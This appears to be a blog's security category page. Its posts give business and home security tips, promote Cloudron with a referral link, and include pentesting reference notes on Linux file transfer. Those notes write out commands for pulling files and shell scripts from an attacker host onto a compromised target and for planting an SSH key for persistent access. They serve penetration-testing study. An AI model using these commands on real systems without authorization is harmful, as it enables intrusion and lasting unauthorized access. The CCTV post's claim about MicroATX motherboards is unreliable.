Skip to content

Category: Security

5 Ways To Help Your Business Stay Protected Online

Throughout history, digital platforms have provided organizations with more opportunities to get noticed, grow, and attain greater long-term viability.

Companies may now reach a greater number of customers, increase their market share, penetrate worldwide markets, and establish a strong degree of presence just by being online. Despite the fact that the internet environment provides several potentials for organizations to grow and become more profitable, it also exposes them to a variety of cybersecurity dangers.

According to research, a number of companies throughout the world have been the target of a cyber-attack of some description. Ransomware attacks, phishing attacks, access breaches, and advanced malware are just a few examples of what you might expect.
Despite the crippling effect that cybersecurity attacks have on enterprises, not all business owners are aware of the best practices for protecting their organizations from security dangers and enhancing their online security. Here are five ways that a business owner can utilize to increase security within their organization.

1. Seek the advice of professionals

Security measures are similar to insurance in that you do not realize you are in need of them until something terrible happens.

When a cyber attack occurs, third-party cybersecurity specialists are dispatched to the scene to quickly analyze the situation and implement the necessary security recovery procedures. As a result, if you are overly concerned about the security of your network or cloud, hiring professionals to manage it will save you the stress of dealing with unknown threats and the potential damage to your brand reputation. It also takes the pressure off you if you are not tech-savvy. If you are asking simple security questions such as “what is malware?”, it is wise to consult with an expert.

Other benefits of outsourcing cybersecurity and other areas of information technology include saving you time and money, as well as having access to consistent and up-to-date information about your company’s IT operations and security posture.

2. Use a secure hosting service to protect your data.

The fact that the majority of internet firms have a website increases their chances of success. While it is appropriate for a website to be visually and aesthetically pleasing, what should be more important is that it is safe and protected from hackers.

As a result, before settling on a firm to host your website, check online reviews and conduct your own investigation. In a hosting service, you should search for the following characteristics:

  • Servers that are secure
  • Personnel who are knowledgeable
  • Systems that are dependable
  • A track record that has been proven

Select a secure hosting service that includes a TLS certificate to encrypt all traffic to and from your website.  When you use this method, the communication between your website and the customer’s browser is encrypted, making it impossible for hackers to see what is happening. If you go for a more self-service package, make sure you have a technician you can rely on and that you use a service like Cloudflare to increase your security.

3. Use secure passwords

Access to your system is granted by passwords, therefore you must pay close attention to them and verify that they are strong enough to protect your company. A strong password is frequently made up of upper and lowercase letters, as well as numbers and other symbols, and it is rarely used. The longer the password, the better (and more difficult to crack). In recent times, security experts have started recommending the use of pass phrases instead of traditional passwords.

Furthermore, your password should be one-of-a-kind and not easily guessable. You can make use of a collection of unconnected letters and words, but be sure you can recall them quickly when the situation calls for it. The more difficult the password is to guess, the more secure it will be. Even more importantly, you should never send your password or any other information that could allow others to get access to your business by email unless it has been encrypted beforehand.

Third parties cannot decrypt information since it is converted into a secret code by encryption. Because of the format in which they transform the assets, it decreases the likelihood of theft.

4. Make sure your security software is updated regularly

The effectiveness of your security system is proportional to the quality of your software. The use of out-of-date software raises the likelihood of your company being the victim of a cyber-attack and becoming a target for hackers. The fact that you are continuously updating your software to the latest available version helps to safeguard your company from security issues.

Update your software security program, as well as the programs that are installed on your computer and digital devices, on a regular basis. Allowing your software packages to automatically upgrade themselves can make this procedure much simpler. This allows them to automatically install updated versions of themselves. In this approach, cyber thieves will have a more difficult time infiltrating your protection system.

5. Make regular backups of your business data.

Losing corporate data and not being able to recover it might cause your company to suffer a big financial loss. Data backups on a regular basis help to secure critical business assets such as your data. A backup system is a system that stores data and allows you to recover it if necessary. It is possible to easily restore backups of your vital data and files even if you are the victim of a cyber-attack, thereby saving your company from suffering a catastrophic loss.

When it comes to backing up your assets, you should use a variety of backup methods. Use both internal and external backup methods to ensure complete protection. In the event that you need to keep part of your data offsite, external backups might assist you in accomplishing this. Your data will remain protected even if one or more of your network servers are hacked as a result.

Another option for backup is cloud storage.  A cloud storage solution allows you to save your files and documents over the internet, where they are safe from unauthorized access. Cloud computing enables you to save as much information as you want. When uploading your materials to the cloud, though, make certain that they are encrypted. By using encryption, you can make your information safer than if it were left in its raw form.

Self Hosting – Cloudron

I have been using Cloudron recently, and after initially trying it out a couple years ago, I found it to be a really easy, awesome way to create my own, personal, cloud, keeping the peering eyes of big-tech out of my life.

So far I have been using Cloudron to manage my OnlyOffice office instance (better than MS Office or Google Docs) and my instance of Nextcloud, a Google Drive-like file storage and sharing center. They integrate with each other to create your own, secure, private office suite with file storage.

The best part is that you can do all this simply from the DigitalOcean Marketplace – a one-click shop for easy installation of everything. All you need is a domain name to point at it.

Once you have it installed, you can set it and forget it, as Cloudron will keep itself updated, patched, and secure.

Cloudron Coupon Code

It isn’t cheap to run Cloudron, but it lets you host 2 app without a subscriotion. I have yet to find a working Cloudron coupon code out there, but there are Cloudron referral codes such as my own (https://cloudron.io/?refcode=901142a319d1498b) which earn the referee a small discount. Once you have your own Cloudron account set up, you can use your own referral code and encourage others to use.

So that is me encouraging you to use my referrer code 😀

Why Time Is Of The Essence In Security Matters

Keeping your home safe is the priority of every homeowner. However, when it comes to safety, you need to understand what you are up against. A lot of households use deterrents such as stickers warning against the dog or the CCTV camera. Do these work in the long term? Inexperienced burglars may be fooled by the presence of a warning sticker, even if you have no guard dog or security camera. However, seasoned criminals take their time to observe and understand your routines. You can bet that they will soon find out about your imaginary dog and learn to ignore the warning notes. 

Real security systems and tips are essential to protect your loved ones and your belongings. The average burglar needs less than a minute to find access to your home. It takes about 10 minutes for them to get in, find your valuables, and exit the house. Therefore, you need to make time a priority.

Real-time CCTV & sensor

It’s a no-brainer. If you’re going to keep burglars away, you need a real CCTV system. Stickers warning about the imaginary security camera are unlikely to deter anyone for long. There are many types of CCTV systems. But experts recommend a solution that can in real-time monitor sensors and make all data — sensor-related and visual information — accessible to the relevant authorities and users. Some security systems can struggle with real-time information transmission; that’s precisely why you want to invest in a CCTV solution with a MicroATX motherboard — a clever piece of tech that enables data transfer and reading at the time of happening. Paired with sensors, you can make sure you know about suspicious broken glass or motion in and around the house when you’re away. 

Picking a lock is a sport

You may not realize it, but most burglars can follow existing tutorials to learn their lock-picking skills. Indeed, locksport is a real activity that consists in picking a lock in the shortest amount of time. For professional lock manufacturers, it can be an insightful activity, revealing the weaknesses of their products and providing improvement tips. However, it also means that burglars can find access to lock-picking information too. It’s no wonder they need under 60 seconds to get inside your home! 

Would a smart lock stop unwanted intruders? Smart locks are tricky to disable mechanically, unlike traditional locks. A burglar would need to hack into your lock using computing knowledge, which can take longer. 

Make no mistakes

More often than not, a burglar doesn’t even need special skills to find their way into your home. Many former criminals warn homeowners against the risks of leaving their garage unlocked. Additionally, your backyard can become the perfect starting place. Families that choose to leave the backdoor open so the pets can come and go freely in and outside the garden could expose themselves to high risks. Lock all your doors and windows; you’d be surprised how quickly someone can gain access to your property then. 

Burglars are fast. They understand that they only have a limited time to get in and out of properties. As a result, the more time-consuming you make it for them to break in, the less likely they are to target your home.

Linux File Transfer Techniques

Digging through my pentesting notes from over the last few years, I pulled together various scrawled things on quick ways to transfer files from one place to another. Thought I’d share the reference here in case anyone finds it useful.

Note: Some of this may have been copy/pasted from various places — I don’t honestly remember. If you recognize something, let me know – I am happy to give credit where credit is due!

Simple Python HTTP Server

This is an easy way to set up a web-server. This command will make the entire folder, from where you issue the command, available on port 9999.

python -m SimpleHTTPServer 9999

Wget

You can download files from that running Pything server using wget like this:

wget 192.168.1.102:9999/file.txt

Curl

curl -O <http://192.168.0.101/file.txt>

Netcat

Another easy way to transfer files is by using netcat.

If you can’t have an interactive shell it might be risky to start listening on a port, since it could be that the attacking-machine is unable to connect. So you are left hanging and can’t do ctr-c because that will kill your session.

So instead you can connect from the target machine like this.

On attacking machine:

nc -lvp 4444 < file

On target machine:

nc 192.168.1.102 4444 > file

You can of course also do it the risky way, the other way around:

So on the victim-machine we run nc like this:

nc -lvp 3333 > enum.sh

And on the attacking machine we send the file like this:

nc 192.168.1.103 < enum.sh

I have sometimes received this error:

This is nc from the netcat-openbsd package. An alternative nc is available

I have just run this command instead:

nc -l 1234 > file.sh

Socat

Server receiving file:

server$ socat -u TCP-LISTEN:9876,reuseaddr OPEN:out.txt,creat && cat out.txt
client$ socat -u FILE:test.txt TCP:127.0.0.1:9876

Server sending file:

server$ socat -u FILE:test.dat TCP-LISTEN:9876,reuseaddr
client$ socat -u TCP:127.0.0.1:9876 OPEN:out.dat,creat

With php

echo "<?php file_put_contents('nameOfFile', fopen('<http://192.168.1.102/file>', 'r')); ?>" > down2.php

Ftp

If you have access to a ftp-client to can of course just use that. Remember, if you are uploading binaries you must use binary mode, otherwise the binary will become corrupted!!!

Tftp

On some rare machine we do not have access to nc and wget, or curl. But we might have access to tftp. Some versions of tftp are run interactively, like this:

$ tftp 192.168.0.101
tftp> get myfile.txt

If we can’t run it interactively, for whatever reason, we can do this trick:

tftp 191.168.0.101 <<< "get shell5555.php shell5555.php"

SSH – SCP

If you manage to upload a reverse-shell and get access to the machine you might be able to enter using ssh. Which might give you a better shell and more stability, and all the other features of SSH. Like transferring files.

So, in the /home/user directory you can find the hidden .ssh files by typing ls -la.Then you need to do two things.

Create a new keypair

You do that with:

ssh-keygen -t rsa -C "your_email@example.com"

then you enter a name for the key.

Enter file in which to save the key (/root/.ssh/id_rsa): nameOfMyKeyEnter passphrase (empty for no passphrase):Enter same passphrase again:

This will create two files, one called nameOfMyKey and another called nameOfMyKey_pub. The one with the _pub is of course your public key. And the other key is your private.

Add your public key to authorized_keys

Now you copy the content of nameOfMyKey_pub.On the compromised machine you go to ~/.ssh and then run add the public key to the file authorized_keys. Like this

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQqlhJKYtL/r9655iwp5TiUM9Khp2DJtsJVW3t5qU765wR5Ni+ALEZYwqxHPNYS/kZ4Vdv..." > authorized_keys

Log in

Now you should be all set to log in using your private key. Like this

ssh -i nameOfMyKey kim@192.168.1.103

SCP

Now we can copy files to a machine using scp

# Copy a file:
scp /path/to/source/file.ext username@192.168.1.101:/path/to/destination/file.ext

# Copy a directory:
scp -r /path/to/source/dir username@192.168.1.101:/path/to/destination

“Smart” Door Lock Drilled Open in 4 Seconds

The most striking (you locksmiths will get that joke) thing about this is that an expensive “smart” lock was made with little to no physical security features in mind. I like how the article points out the difficulty of physically compromising a good-ole-fashioned steel, “dumb” mortise lock.

Is it true that “smart” lock manufacturers are forgetting about physical security when designing locks? Isn’t that the point of a lock?

Thoughts on OSCP being ‘outdated’

In recent weeks I have been reading comments online about the Penetration Testing with Kali Linux (PWK) course and OSCP exam taking a lot of flak for being “tool old” and using “outdated exploits that don’t even work anymore.”

I believe most of these comments are directed at the lab environment and course materials. It is true that you won’t find many systems in modern pentesting engagements that are exploitable with older things such as EternalBlue (MS17-010).

But that is beside the point.

The PWK and OSCP exam are all about teaching you how to think, solve problems, persevere, and develop a pentesting methodology that works for you.

It is true that Hack The Box (HTB) and other modern online capture-the-flag frameworks are more leading-edge in that regard, which is great, and they can certainly be an excellent way to augment and prepare for the PWK/OSCP journey.

But the point is that it really doesn’t matter if you drive a 2019 Ferrari 488 Spider or a 1996 Honda Accord, it is whether or not you figure out how to get to the destination.